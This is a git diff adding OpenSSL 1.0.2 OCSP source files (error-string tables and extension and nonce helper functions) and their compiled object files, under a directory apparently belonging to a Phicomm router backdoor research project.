+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/ocsp.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_OCSP,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_OCSP,0,reason)
+
+static ERR_STRING_DATA OCSP_str_functs[] = {
+    {ERR_FUNC(OCSP_F_ASN1_STRING_ENCODE), "ASN1_STRING_encode"},
+    {ERR_FUNC(OCSP_F_D2I_OCSP_NONCE), "D2I_OCSP_NONCE"},
+    {ERR_FUNC(OCSP_F_OCSP_BASIC_ADD1_STATUS), "OCSP_basic_add1_status"},
+    {ERR_FUNC(OCSP_F_OCSP_BASIC_SIGN), "OCSP_basic_sign"},
+    {ERR_FUNC(OCSP_F_OCSP_BASIC_VERIFY), "OCSP_basic_verify"},
+    {ERR_FUNC(OCSP_F_OCSP_CERT_ID_NEW), "OCSP_cert_id_new"},
+    {ERR_FUNC(OCSP_F_OCSP_CHECK_DELEGATED), "OCSP_CHECK_DELEGATED"},
+    {ERR_FUNC(OCSP_F_OCSP_CHECK_IDS), "OCSP_CHECK_IDS"},
+    {ERR_FUNC(OCSP_F_OCSP_CHECK_ISSUER), "OCSP_CHECK_ISSUER"},
+    {ERR_FUNC(OCSP_F_OCSP_CHECK_VALIDITY), "OCSP_check_validity"},
+    {ERR_FUNC(OCSP_F_OCSP_MATCH_ISSUERID), "OCSP_MATCH_ISSUERID"},
+    {ERR_FUNC(OCSP_F_OCSP_PARSE_URL), "OCSP_parse_url"},
+    {ERR_FUNC(OCSP_F_OCSP_REQUEST_SIGN), "OCSP_request_sign"},
+    {ERR_FUNC(OCSP_F_OCSP_REQUEST_VERIFY), "OCSP_request_verify"},
+    {ERR_FUNC(OCSP_F_OCSP_RESPONSE_GET1_BASIC), "OCSP_response_get1_basic"},
+    {ERR_FUNC(OCSP_F_OCSP_SENDREQ_BIO), "OCSP_sendreq_bio"},
+    {ERR_FUNC(OCSP_F_OCSP_SENDREQ_NBIO), "OCSP_sendreq_nbio"},
+    {ERR_FUNC(OCSP_F_PARSE_HTTP_LINE1), "PARSE_HTTP_LINE1"},
+    {ERR_FUNC(OCSP_F_REQUEST_VERIFY), "REQUEST_VERIFY"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA OCSP_str_reasons[] = {
+    {ERR_REASON(OCSP_R_BAD_DATA), "bad data"},
+    {ERR_REASON(OCSP_R_CERTIFICATE_VERIFY_ERROR), "certificate verify error"},
+    {ERR_REASON(OCSP_R_DIGEST_ERR), "digest err"},
+    {ERR_REASON(OCSP_R_ERROR_IN_NEXTUPDATE_FIELD),
+     "error in nextupdate field"},
+    {ERR_REASON(OCSP_R_ERROR_IN_THISUPDATE_FIELD),
+     "error in thisupdate field"},
+    {ERR_REASON(OCSP_R_ERROR_PARSING_URL), "error parsing url"},
+    {ERR_REASON(OCSP_R_MISSING_OCSPSIGNING_USAGE),
+     "missing ocspsigning usage"},
+    {ERR_REASON(OCSP_R_NEXTUPDATE_BEFORE_THISUPDATE),
+     "nextupdate before thisupdate"},
+    {ERR_REASON(OCSP_R_NOT_BASIC_RESPONSE), "not basic response"},
+    {ERR_REASON(OCSP_R_NO_CERTIFICATES_IN_CHAIN), "no certificates in chain"},
+    {ERR_REASON(OCSP_R_NO_CONTENT), "no content"},
+    {ERR_REASON(OCSP_R_NO_PUBLIC_KEY), "no public key"},
+    {ERR_REASON(OCSP_R_NO_RESPONSE_DATA), "no response data"},
+    {ERR_REASON(OCSP_R_NO_REVOKED_TIME), "no revoked time"},
+    {ERR_REASON(OCSP_R_PRIVATE_KEY_DOES_NOT_MATCH_CERTIFICATE),
+     "private key does not match certificate"},
+    {ERR_REASON(OCSP_R_REQUEST_NOT_SIGNED), "request not signed"},
+    {ERR_REASON(OCSP_R_RESPONSE_CONTAINS_NO_REVOCATION_DATA),
+     "response contains no revocation data"},
+    {ERR_REASON(OCSP_R_ROOT_CA_NOT_TRUSTED), "root ca not trusted"},
+    {ERR_REASON(OCSP_R_SERVER_READ_ERROR), "server read error"},
+    {ERR_REASON(OCSP_R_SERVER_RESPONSE_ERROR), "server response error"},
+    {ERR_REASON(OCSP_R_SERVER_RESPONSE_PARSE_ERROR),
+     "server response parse error"},
+    {ERR_REASON(OCSP_R_SERVER_WRITE_ERROR), "server write error"},
+    {ERR_REASON(OCSP_R_SIGNATURE_FAILURE), "signature failure"},
+    {ERR_REASON(OCSP_R_SIGNER_CERTIFICATE_NOT_FOUND),
+     "signer certificate not found"},
+    {ERR_REASON(OCSP_R_STATUS_EXPIRED), "status expired"},
+    {ERR_REASON(OCSP_R_STATUS_NOT_YET_VALID), "status not yet valid"},
+    {ERR_REASON(OCSP_R_STATUS_TOO_OLD), "status too old"},
+    {ERR_REASON(OCSP_R_UNKNOWN_MESSAGE_DIGEST), "unknown message digest"},
+    {ERR_REASON(OCSP_R_UNKNOWN_NID), "unknown nid"},
+    {ERR_REASON(OCSP_R_UNSUPPORTED_REQUESTORNAME_TYPE),
+     "unsupported requestorname type"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_OCSP_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(OCSP_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, OCSP_str_functs);
+        ERR_load_strings(0, OCSP_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..32e739368006b98f484817b7cbe1ff79a74217ec
GIT binary patch
literal 1368
zcmbtS%}T>S5S}zus}}shgHVy`MMb;RKSU2wD76<+sT90ONZZ(oHYv##tOtFCK8lYZ
z_!2&b;?0ZBG`n%TRs<cG%*>bh=4W^B3x@|W!vHA;?88?iQGm19m!IpoIY`1dyiLr%
zKS42{-%Br-D{Ysz)4ObwWi#tL?OwQkw~=Mpt(6dlIC3XZhfs@0Wx%qJgqf%$Gob<F
zwgkq_q>)OFB)T{d;dA02aeouqAr7w}gYwLQ8`2EQk_yp`rc*$4&E6LM7)2%we+PT`
z$PYN3K))n0oL1(HcJ``4%W{05RiRKSS=XLjvyStpCsx4yOSc|~GHGFHqrR<J&}nkJ
z0u1v*+mIf2ZaA=-&23<nAOKeNnoY+=%=Ng#@VYVqx2snouDfm4^1YVh^A0fIxwe_p
zur7SN>4@h4Fe&8H9qK2U6E&mr5V8Jd7Z4{*zAKRi1?gy3=P%*^1nOV;YsjUVSyWYI
z|5X)4U-p-FTfx-SmKrF&<VlG7&}-|vdyFMNjlL?ht19OhP)(iR6-oMDI{ysw=vC)L
zzBJEb&{+YDqNO<{U*dy$6XlUUC@-ObF|<@e=M$#i9Z?=c|3wNE5paY|p*M*CA`<IS
IX6WerPu;mtjsO4v

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_ext.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_ext.c
new file mode 100644
index 0000000..849cb2f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_ext.c
@@ -0,0 +1,566 @@
+/* ocsp_ext.c */
+/*
+ * Written by Tom Titchener <Tom_Titchener@groove.net> for the OpenSSL
+ * project.
+ */
+
+/*
+ * History: This file was transfered to Richard Levitte from CertCo by Kathy
+ * Weinhold in mid-spring 2000 to be included in OpenSSL or released as a
+ * patch kit.
+ */
+
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <cryptlib.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+#include <openssl/ocsp.h>
+#include <openssl/rand.h>
+#include <openssl/x509v3.h>
+
+/* Standard wrapper functions for extensions */
+
+/* OCSP request extensions */
+
+int OCSP_REQUEST_get_ext_count(OCSP_REQUEST *x)
+{
+    return (X509v3_get_ext_count(x->tbsRequest->requestExtensions));
+}
+
+int OCSP_REQUEST_get_ext_by_NID(OCSP_REQUEST *x, int nid, int lastpos)
+{
+    return (X509v3_get_ext_by_NID
+            (x->tbsRequest->requestExtensions, nid, lastpos));
+}
+
+int OCSP_REQUEST_get_ext_by_OBJ(OCSP_REQUEST *x, ASN1_OBJECT *obj,
+                                int lastpos)
+{
+    return (X509v3_get_ext_by_OBJ
+            (x->tbsRequest->requestExtensions, obj, lastpos));
+}
+
+int OCSP_REQUEST_get_ext_by_critical(OCSP_REQUEST *x, int crit, int lastpos)
+{
+    return (X509v3_get_ext_by_critical
+            (x->tbsRequest->requestExtensions, crit, lastpos));
+}
+
+X509_EXTENSION *OCSP_REQUEST_get_ext(OCSP_REQUEST *x, int loc)
+{
+    return (X509v3_get_ext(x->tbsRequest->requestExtensions, loc));
+}
+
+X509_EXTENSION *OCSP_REQUEST_delete_ext(OCSP_REQUEST *x, int loc)
+{
+    return (X509v3_delete_ext(x->tbsRequest->requestExtensions, loc));
+}
+
+void *OCSP_REQUEST_get1_ext_d2i(OCSP_REQUEST *x, int nid, int *crit, int *idx)
+{
+    return X509V3_get_d2i(x->tbsRequest->requestExtensions, nid, crit, idx);
+}
+
+int OCSP_REQUEST_add1_ext_i2d(OCSP_REQUEST *x, int nid, void *value, int crit,
+                              unsigned long flags)
+{
+    return X509V3_add1_i2d(&x->tbsRequest->requestExtensions, nid, value,
+                           crit, flags);
+}
+
+int OCSP_REQUEST_add_ext(OCSP_REQUEST *x, X509_EXTENSION *ex, int loc)
+{
+    return (X509v3_add_ext(&(x->tbsRequest->requestExtensions), ex, loc) !=
+            NULL);
+}
+
+/* Single extensions */
+
+int OCSP_ONEREQ_get_ext_count(OCSP_ONEREQ *x)
+{
+    return (X509v3_get_ext_count(x->singleRequestExtensions));
+}
+
+int OCSP_ONEREQ_get_ext_by_NID(OCSP_ONEREQ *x, int nid, int lastpos)
+{
+    return (X509v3_get_ext_by_NID(x->singleRequestExtensions, nid, lastpos));
+}
+
+int OCSP_ONEREQ_get_ext_by_OBJ(OCSP_ONEREQ *x, ASN1_OBJECT *obj, int lastpos)
+{
+    return (X509v3_get_ext_by_OBJ(x->singleRequestExtensions, obj, lastpos));
+}
+
+int OCSP_ONEREQ_get_ext_by_critical(OCSP_ONEREQ *x, int crit, int lastpos)
+{
+    return (X509v3_get_ext_by_critical
+            (x->singleRequestExtensions, crit, lastpos));
+}
+
+X509_EXTENSION *OCSP_ONEREQ_get_ext(OCSP_ONEREQ *x, int loc)
+{
+    return (X509v3_get_ext(x->singleRequestExtensions, loc));
+}
+
+X509_EXTENSION *OCSP_ONEREQ_delete_ext(OCSP_ONEREQ *x, int loc)
+{
+    return (X509v3_delete_ext(x->singleRequestExtensions, loc));
+}
+
+void *OCSP_ONEREQ_get1_ext_d2i(OCSP_ONEREQ *x, int nid, int *crit, int *idx)
+{
+    return X509V3_get_d2i(x->singleRequestExtensions, nid, crit, idx);
+}
+
+int OCSP_ONEREQ_add1_ext_i2d(OCSP_ONEREQ *x, int nid, void *value, int crit,
+                             unsigned long flags)
+{
+    return X509V3_add1_i2d(&x->singleRequestExtensions, nid, value, crit,
+                           flags);
+}
+
+int OCSP_ONEREQ_add_ext(OCSP_ONEREQ *x, X509_EXTENSION *ex, int loc)
+{
+    return (X509v3_add_ext(&(x->singleRequestExtensions), ex, loc) != NULL);
+}
+
+/* OCSP Basic response */
+
+int OCSP_BASICRESP_get_ext_count(OCSP_BASICRESP *x)
+{
+    return (X509v3_get_ext_count(x->tbsResponseData->responseExtensions));
+}
+
+int OCSP_BASICRESP_get_ext_by_NID(OCSP_BASICRESP *x, int nid, int lastpos)
+{
+    return (X509v3_get_ext_by_NID
+            (x->tbsResponseData->responseExtensions, nid, lastpos));
+}
+
+int OCSP_BASICRESP_get_ext_by_OBJ(OCSP_BASICRESP *x, ASN1_OBJECT *obj,
+                                  int lastpos)
+{
+    return (X509v3_get_ext_by_OBJ
+            (x->tbsResponseData->responseExtensions, obj, lastpos));
+}
+
+int OCSP_BASICRESP_get_ext_by_critical(OCSP_BASICRESP *x, int crit,
+                                       int lastpos)
+{
+    return (X509v3_get_ext_by_critical
+            (x->tbsResponseData->responseExtensions, crit, lastpos));
+}
+
+X509_EXTENSION *OCSP_BASICRESP_get_ext(OCSP_BASICRESP *x, int loc)
+{
+    return (X509v3_get_ext(x->tbsResponseData->responseExtensions, loc));
+}
+
+X509_EXTENSION *OCSP_BASICRESP_delete_ext(OCSP_BASICRESP *x, int loc)
+{
+    return (X509v3_delete_ext(x->tbsResponseData->responseExtensions, loc));
+}
+
+void *OCSP_BASICRESP_get1_ext_d2i(OCSP_BASICRESP *x, int nid, int *crit,
+                                  int *idx)
+{
+    return X509V3_get_d2i(x->tbsResponseData->responseExtensions, nid, crit,
+                          idx);
+}
+
+int OCSP_BASICRESP_add1_ext_i2d(OCSP_BASICRESP *x, int nid, void *value,
+                                int crit, unsigned long flags)
+{
+    return X509V3_add1_i2d(&x->tbsResponseData->responseExtensions, nid,
+                           value, crit, flags);
+}
+
+int OCSP_BASICRESP_add_ext(OCSP_BASICRESP *x, X509_EXTENSION *ex, int loc)
+{
+    return (X509v3_add_ext(&(x->tbsResponseData->responseExtensions), ex, loc)
+            != NULL);
+}
+
+/* OCSP single response extensions */
+
+int OCSP_SINGLERESP_get_ext_count(OCSP_SINGLERESP *x)
+{
+    return (X509v3_get_ext_count(x->singleExtensions));
+}
+
+int OCSP_SINGLERESP_get_ext_by_NID(OCSP_SINGLERESP *x, int nid, int lastpos)
+{
+    return (X509v3_get_ext_by_NID(x->singleExtensions, nid, lastpos));
+}
+
+int OCSP_SINGLERESP_get_ext_by_OBJ(OCSP_SINGLERESP *x, ASN1_OBJECT *obj,
+                                   int lastpos)
+{
+    return (X509v3_get_ext_by_OBJ(x->singleExtensions, obj, lastpos));
+}
+
+int OCSP_SINGLERESP_get_ext_by_critical(OCSP_SINGLERESP *x, int crit,
+                                        int lastpos)
+{
+    return (X509v3_get_ext_by_critical(x->singleExtensions, crit, lastpos));
+}
+
+X509_EXTENSION *OCSP_SINGLERESP_get_ext(OCSP_SINGLERESP *x, int loc)
+{
+    return (X509v3_get_ext(x->singleExtensions, loc));
+}
+
+X509_EXTENSION *OCSP_SINGLERESP_delete_ext(OCSP_SINGLERESP *x, int loc)
+{
+    return (X509v3_delete_ext(x->singleExtensions, loc));
+}
+
+void *OCSP_SINGLERESP_get1_ext_d2i(OCSP_SINGLERESP *x, int nid, int *crit,
+                                   int *idx)
+{
+    return X509V3_get_d2i(x->singleExtensions, nid, crit, idx);
+}
+
+int OCSP_SINGLERESP_add1_ext_i2d(OCSP_SINGLERESP *x, int nid, void *value,
+                                 int crit, unsigned long flags)
+{
+    return X509V3_add1_i2d(&x->singleExtensions, nid, value, crit, flags);
+}
+
+int OCSP_SINGLERESP_add_ext(OCSP_SINGLERESP *x, X509_EXTENSION *ex, int loc)
+{
+    return (X509v3_add_ext(&(x->singleExtensions), ex, loc) != NULL);
+}
+
+/* also CRL Entry Extensions */
+#if 0
+ASN1_STRING *ASN1_STRING_encode(ASN1_STRING *s, i2d_of_void *i2d,
+                                void *data, STACK_OF(ASN1_OBJECT) *sk)
+{
+    int i;
+    unsigned char *p, *b = NULL;
+
+    if (data) {
+        if ((i = i2d(data, NULL)) <= 0)
+            goto err;
+        if (!(b = p = OPENSSL_malloc((unsigned int)i)))
+            goto err;
+        if (i2d(data, &p) <= 0)
+            goto err;
+    } else if (sk) {
+        if ((i = i2d_ASN1_SET_OF_ASN1_OBJECT(sk, NULL,
+                                             (I2D_OF(ASN1_OBJECT)) i2d,
+                                             V_ASN1_SEQUENCE,
+                                             V_ASN1_UNIVERSAL,
+                                             IS_SEQUENCE)) <= 0)
+             goto err;
+        if (!(b = p = OPENSSL_malloc((unsigned int)i)))
+            goto err;
+        if (i2d_ASN1_SET_OF_ASN1_OBJECT(sk, &p, (I2D_OF(ASN1_OBJECT)) i2d,
+                                        V_ASN1_SEQUENCE,
+                                        V_ASN1_UNIVERSAL, IS_SEQUENCE) <= 0)
+             goto err;
+    } else {
+        OCSPerr(OCSP_F_ASN1_STRING_ENCODE, OCSP_R_BAD_DATA);
+        goto err;
+    }
+    if (!s && !(s = ASN1_STRING_new()))
+        goto err;
+    if (!(ASN1_STRING_set(s, b, i)))
+        goto err;
+    OPENSSL_free(b);
+    return s;
+ err:
+    if (b)
+        OPENSSL_free(b);
+    return NULL;
+}
+#endif
+
+/* Nonce handling functions */
+
+/*
+ * Add a nonce to an extension stack. A nonce can be specificed or if NULL a
+ * random nonce will be generated. Note: OpenSSL 0.9.7d and later create an
+ * OCTET STRING containing the nonce, previous versions used the raw nonce.
+ */
+
+static int ocsp_add1_nonce(STACK_OF(X509_EXTENSION) **exts,
+                           unsigned char *val, int len)
+{
+    unsigned char *tmpval;
+    ASN1_OCTET_STRING os;
+    int ret = 0;
+    if (len <= 0)
+        len = OCSP_DEFAULT_NONCE_LENGTH;
+    /*
+     * Create the OCTET STRING manually by writing out the header and
+     * appending the content octets. This avoids an extra memory allocation
+     * operation in some cases. Applications should *NOT* do this because it
+     * relies on library internals.
+     */
+    os.length = ASN1_object_size(0, len, V_ASN1_OCTET_STRING);
+    os.data = OPENSSL_malloc(os.length);
+    if (os.data == NULL)
+        goto err;
+    tmpval = os.data;
+    ASN1_put_object(&tmpval, 0, len, V_ASN1_OCTET_STRING, V_ASN1_UNIVERSAL);
+    if (val)
+        memcpy(tmpval, val, len);
+    else
+        RAND_pseudo_bytes(tmpval, len);
+    if (!X509V3_add1_i2d(exts, NID_id_pkix_OCSP_Nonce,
+                         &os, 0, X509V3_ADD_REPLACE))
+        goto err;
+    ret = 1;
+ err:
+    if (os.data)
+        OPENSSL_free(os.data);
+    return ret;
+}
+
+/* Add nonce to an OCSP request */
+
+int OCSP_request_add1_nonce(OCSP_REQUEST *req, unsigned char *val, int len)
+{
+    return ocsp_add1_nonce(&req->tbsRequest->requestExtensions, val, len);
+}
+
+/* Same as above but for a response */
+
+int OCSP_basic_add1_nonce(OCSP_BASICRESP *resp, unsigned char *val, int len)
+{
+    return ocsp_add1_nonce(&resp->tbsResponseData->responseExtensions, val,
+                           len);
+}
+
+/*-
+ * Check nonce validity in a request and response.
+ * Return value reflects result:
+ *  1: nonces present and equal.
+ *  2: nonces both absent.
+ *  3: nonce present in response only.
+ *  0: nonces both present and not equal.
+ * -1: nonce in request only.
+ *
+ *  For most responders clients can check return > 0.
+ *  If responder doesn't handle nonces return != 0 may be
+ *  necessary. return == 0 is always an error.
+ */
+
+int OCSP_check_nonce(OCSP_REQUEST *req, OCSP_BASICRESP *bs)
+{
+    /*
+     * Since we are only interested in the presence or absence of
+     * the nonce and comparing its value there is no need to use
+     * the X509V3 routines: this way we can avoid them allocating an
+     * ASN1_OCTET_STRING structure for the value which would be
+     * freed immediately anyway.
+     */
+
+    int req_idx, resp_idx;
+    X509_EXTENSION *req_ext, *resp_ext;
+    req_idx = OCSP_REQUEST_get_ext_by_NID(req, NID_id_pkix_OCSP_Nonce, -1);
+    resp_idx = OCSP_BASICRESP_get_ext_by_NID(bs, NID_id_pkix_OCSP_Nonce, -1);
+    /* Check both absent */
+    if ((req_idx < 0) && (resp_idx < 0))
+        return 2;
+    /* Check in request only */
+    if ((req_idx >= 0) && (resp_idx < 0))
+        return -1;
+    /* Check in response but not request */
+    if ((req_idx < 0) && (resp_idx >= 0))
+        return 3;
+    /*
+     * Otherwise nonce in request and response so retrieve the extensions
+     */
+    req_ext = OCSP_REQUEST_get_ext(req, req_idx);
+    resp_ext = OCSP_BASICRESP_get_ext(bs, resp_idx);
+    if (ASN1_OCTET_STRING_cmp(req_ext->value, resp_ext->value))
+        return 0;
+    return 1;
+}
+
+/*
+ * Copy the nonce value (if any) from an OCSP request to a response.
+ */
+
+int OCSP_copy_nonce(OCSP_BASICRESP *resp, OCSP_REQUEST *req)
+{
+    X509_EXTENSION *req_ext;
+    int req_idx;
+    /* Check for nonce in request */
+    req_idx = OCSP_REQUEST_get_ext_by_NID(req, NID_id_pkix_OCSP_Nonce, -1);
+    /* If no nonce that's OK */
+    if (req_idx < 0)
+        return 2;
+    req_ext = OCSP_REQUEST_get_ext(req, req_idx);
+    return OCSP_BASICRESP_add_ext(resp, req_ext, -1);
+}
+
+X509_EXTENSION *OCSP_crlID_new(char *url, long *n, char *tim)
+{
+    X509_EXTENSION *x = NULL;
+    OCSP_CRLID *cid = NULL;
+
+    if (!(cid = OCSP_CRLID_new()))
+        goto err;
+    if (url) {
+        if (!(cid->crlUrl = ASN1_IA5STRING_new()))
+            goto err;
+        if (!(ASN1_STRING_set(cid->crlUrl, url, -1)))
+            goto err;
+    }
+    if (n) {
+        if (!(cid->crlNum = ASN1_INTEGER_new()))
+            goto err;
+        if (!(ASN1_INTEGER_set(cid->crlNum, *n)))
+            goto err;
+    }
+    if (tim) {
+        if (!(cid->crlTime = ASN1_GENERALIZEDTIME_new()))
+            goto err;
+        if (!(ASN1_GENERALIZEDTIME_set_string(cid->crlTime, tim)))
+            goto err;
+    }
+    x = X509V3_EXT_i2d(NID_id_pkix_OCSP_CrlID, 0, cid);
+ err:
+    if (cid)
+        OCSP_CRLID_free(cid);
+    return x;
+}
+
+/*   AcceptableResponses ::= SEQUENCE OF OBJECT IDENTIFIER */
+X509_EXTENSION *OCSP_accept_responses_new(char **oids)
+{
+    int nid;
+    STACK_OF(ASN1_OBJECT) *sk = NULL;
+    ASN1_OBJECT *o = NULL;
+    X509_EXTENSION *x = NULL;
+
+    if (!(sk = sk_ASN1_OBJECT_new_null()))
+        goto err;
+    while (oids && *oids) {
+        if ((nid = OBJ_txt2nid(*oids)) != NID_undef && (o = OBJ_nid2obj(nid)))
+            sk_ASN1_OBJECT_push(sk, o);
+        oids++;
+    }
+    x = X509V3_EXT_i2d(NID_id_pkix_OCSP_acceptableResponses, 0, sk);
+ err:
+    if (sk)
+        sk_ASN1_OBJECT_pop_free(sk, ASN1_OBJECT_free);
+    return x;
+}
+
+/*  ArchiveCutoff ::= GeneralizedTime */
+X509_EXTENSION *OCSP_archive_cutoff_new(char *tim)
+{
+    X509_EXTENSION *x = NULL;
+    ASN1_GENERALIZEDTIME *gt = NULL;
+
+    if (!(gt = ASN1_GENERALIZEDTIME_new()))
+        goto err;
+    if (!(ASN1_GENERALIZEDTIME_set_string(gt, tim)))
+        goto err;
+    x = X509V3_EXT_i2d(NID_id_pkix_OCSP_archiveCutoff, 0, gt);
+ err:
+    if (gt)
+        ASN1_GENERALIZEDTIME_free(gt);
+    return x;
+}
+
+/*
+ * per ACCESS_DESCRIPTION parameter are oids, of which there are currently
+ * two--NID_ad_ocsp, NID_id_ad_caIssuers--and GeneralName value.  This method
+ * forces NID_ad_ocsp and uniformResourceLocator [6] IA5String.
+ */
+X509_EXTENSION *OCSP_url_svcloc_new(X509_NAME *issuer, char **urls)
+{
+    X509_EXTENSION *x = NULL;
+    ASN1_IA5STRING *ia5 = NULL;
+    OCSP_SERVICELOC *sloc = NULL;
+    ACCESS_DESCRIPTION *ad = NULL;
+
+    if (!(sloc = OCSP_SERVICELOC_new()))
+        goto err;
+    if (!(sloc->issuer = X509_NAME_dup(issuer)))
+        goto err;
+    if (urls && *urls && !(sloc->locator = sk_ACCESS_DESCRIPTION_new_null()))
+        goto err;
+    while (urls && *urls) {
+        if (!(ad = ACCESS_DESCRIPTION_new()))
+            goto err;
+        if (!(ad->method = OBJ_nid2obj(NID_ad_OCSP)))
+            goto err;
+        if (!(ad->location = GENERAL_NAME_new()))
+            goto err;
+        if (!(ia5 = ASN1_IA5STRING_new()))
+            goto err;
+        if (!ASN1_STRING_set((ASN1_STRING *)ia5, *urls, -1))
+            goto err;
+        ad->location->type = GEN_URI;
+        ad->location->d.ia5 = ia5;
+        if (!sk_ACCESS_DESCRIPTION_push(sloc->locator, ad))
+            goto err;
+        urls++;
+    }
+    x = X509V3_EXT_i2d(NID_id_pkix_OCSP_serviceLocator, 0, sloc);
+ err:
+    if (sloc)
+        OCSP_SERVICELOC_free(sloc);
+    return x;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_ext.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_ext.o
new file mode 100644
index 0000000000000000000000000000000000000000..61e8ec097f72c38c6bdf1491a2975e9143df48e7
GIT binary patch
literal 11208
zcmchde{dAl9l)0)NaV*QwWv{0;utj|Tyua0vDRGfF4@B)iMb0x0N3QQm|&8NcY7F+
zs%;3e1S->FYn@J=s<r&lsXsd7sH62P$PY(5juo|H9ojP0h(R2!S{2jp_wD!PzW1{G
zPiy;T_V&Hc_s9Fb@7sO5`;yxuvHGG(lQdZ-Y2VfIElD*^ug=$NMYUG*X*0B7YcLVD
zzifS`9AI3xKhg)^U(%@$mt2Gfx*e{n4&;Vjxvj`P{8R}L`$S+Y5*U3KT|8w%Px{Ww
zv2Gs#)pCK+s6rpgS=UDbxxgp-&dpV&PYT=jP*mzD4IPOML&KVGkHqW)y8ZS?4<4Ut
zpMbiM2M*~w6IJEGCyKy%%zo$hebATecqkVvyZd>4cr*4hW=(cHg1hQYeW4S%goFE*
zgza}%uMMsVuHE}l+4-OA!&CI(fr=3f`v23uS|2=+@2^=O7C^+@25Bn0J6HC2j$*sL
zlm+&+HU<ymT{lBS&NNI20FzV6V)$RTF&Fv%C^?lL$;m6~!?%B(jlvk9<sN`DlZU<>
z8*{E4C-^6+9b7T^!dTS)D%cve|0%B5V50R};Ryr+#Ox33=LNAx>^}tUeb0@|dG5VA
